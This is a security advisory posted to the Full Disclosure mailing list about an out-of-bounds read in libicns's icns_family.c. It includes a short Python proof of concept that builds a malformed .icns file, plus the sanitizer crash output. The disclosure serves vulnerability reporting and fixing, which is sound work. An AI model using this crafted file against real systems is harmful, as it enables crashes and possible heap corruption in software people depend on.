libicns v0.8.1 Out-of-Bounds Read in libicns icns_family.c when parsing malformed .icns files

[Ron E <ronaldjedgerson () gmail com>]

libicns fails to validate element size fields in .icns files properly. A
crafted file can cause the library to allocate insufficient memory for an
icns_family_t structure. When icns_family.c treats this undersized memory
as a complete struct, it dereferences members that lie beyond the allocated
space. This results in an Out-of-Bounds Read (CWE-125). Depending on
subsequent code paths, these invalid member references may also be written
to, escalating to an Out-of-Bounds Write (CWE-787).

*Impact:*

   - Out-of-Bounds Read → crash (Denial of Service).
   - If invalid struct members are later updated, this may cause
   Out-of-Bounds Write and heap corruption.
   - With controlled heap layouts, an attacker could leverage the writes
   for arbitrary code execution.



*Proof of Concept:*

Save as bad.icns:
---

*i*mport struct


data  = b'icns'

data += struct.pack('>I', 32)       # fake file size

data += b'ic07'                     # 128x128 ARGB type

data += struct.pack('>I', 16)       # bogus element size

data += b'\xff' * 8                 # filler


open('bad.icns','wb').write(data)

----

./icnsutil -c icns -o out.png bad.icns


*Output:*
icns_family.c:58:2: runtime error: member access within address
0x502000000030 with insufficient space for an object of type
'icns_family_t' (aka 'struct icns_family_t') 0x502000000030: note: pointer
points here 00 00 00 00 be be be be be be be be 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/